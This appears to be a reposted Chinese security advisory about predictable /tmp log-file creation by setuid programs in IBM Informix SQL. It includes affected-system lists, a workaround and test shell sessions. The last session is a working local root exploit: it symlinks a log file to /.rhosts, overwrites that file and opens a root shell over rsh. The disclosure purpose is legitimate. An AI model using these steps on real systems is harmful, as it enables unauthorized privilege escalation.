Informix SQL SNMPDM 可预知的临时文件创建漏洞
2008-04-09 04:30:04来源:互联网 阅读 ()
发布日期:2001-09-04
更新日期:2001-09-11
受影响系统:
描述:
IBM Informix SQL 7.31.UC5
IBM Informix SQL 9.20 UC2
- Sun Solaris 7.0
- Sun Solaris 2.6
- Slackware Linux 8.0
- Slackware Linux 7.1
- Slackware Linux 7.0
- S.u.S.E. Linux 7.2
- S.u.S.E. Linux 7.1x86
- S.u.S.E. Linux 7.0
- RedHat Linux 7.1 i386
- RedHat Linux 7.0 i386
- RedHat Linux 6.2E i386
- RedHat Linux 6.2 i386
- MandrakeSoft Linux Mandrake 8.0
- MandrakeSoft Linux Mandrake 7.2
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- Debian Linux 2.2
- Conectiva Linux 7.0
- Conectiva Linux 6.0
- Conectiva Linux graficas
- Conectiva Linux ecommerce
BUGTRAQ ID: 3287
Informix是由IBM发布和维护的企业级数据库产品。
发现Informix SQL附加软件包中的多个程序在“/tmp”目录下创建日志文件时,文件名可预知,
而且在创建文件之前没有检查该文件是否存在或者是否为普通文件,又因为这些程序有setuid位,
导致攻击者可能利用这个漏洞覆盖任何系统文件,提升权限或者是进行拒绝服务攻击。
可能存在问题的程序有:
onbar_d ondblog onsmsync onsrvapd snmpdm
<*来源:(s96192@ce.hannam.ac.kr)
链接: http://archives.neohapsis.com/archives/bugtraq/2001-08/0463.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
(s96192@ce.hannam.ac.kr)提供了如下测试代码:
第一部分:
$ id
uid=500 (informix) gid=120 (informix) groups=1000(loveyou)
$ umask 0000
$ cd ~informix/bin (Informix HOME Directory)
$ ./onshowaudit
INFORMIX-SQL Version 7.31.UC5
$ ls -al onbar_d ondblog onsmsync onsrvapd
-rwsr-sr-x 1 root informix 2234104 Nov 18 1999 onbar_d
-rwsr-sr-x 1 root informix 2219456 Nov 18 1999 ondblog
-rwsr-sr-x 1 root informix 2284972 Apr 10 2000 onsmsync
-rwsr-sr-x 1 root informix 39144 Nov 18 1999 onsrvapd
$ ./onbar_d 或 ./ondblog 或 ./onsmsync
$ ls -al /tmp/bar*
-rw-rw---- 1 root informix 557 Aug 29 17:26 /tmp/bar_act.log
-rw-rw---- 1 root informix 0 Aug 29 17:26 /tmp/bar_dbug.log
第二部分:
$ ./onsrvapd
$ ls -al /tmp/ons*
-rw-rw-rw- 1 root informix 141 Aug 29 17:38 /tmp/onsnmp.(hostname).log
-rw-rw-rw- 1 informix informix 319 Aug 29 17:38 /tmp/onsrvapd.log
第三部分:
$ ./snmpdm
$ ls -al /tmp/snmpd.log
-rwxrwxrwx 1 root root 1085 Aug 29 17:43 /tmp/snmpd.log
第四部分:
loveyou@dogfoot$ ln -s /.rhosts /tmp/onsbmp.dogfoot.log
loveyou@dogfoot$ ~informix/bin/onsrvapd &
loveyou@dogfoot$ ls -al /.rhosts
-rw-rw-rw- 1 root informix 141 Aug 29 18:28 /.rhosts
loveyou@dogfoot$ echo " " > /.rhosts
loveyou@dogfoot$ rsh -l root localhost csh -i
# whoami
root
建议:
临时解决方法:
我们建议你在安装升级补丁之前,临时去掉该程序的setuid位:
$ su -
# cd ~informix/bin (Informix 主目录)
# chmod o-s onbar_d ondblog onsmsync onsrvapd snmpdm
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.informix.com/
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
